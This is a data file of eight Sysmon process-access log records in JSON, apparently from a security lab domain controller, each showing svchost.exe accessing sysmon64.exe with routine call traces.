{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1499,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1500,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1501,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1502,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1503,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1504,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1505,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1506,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
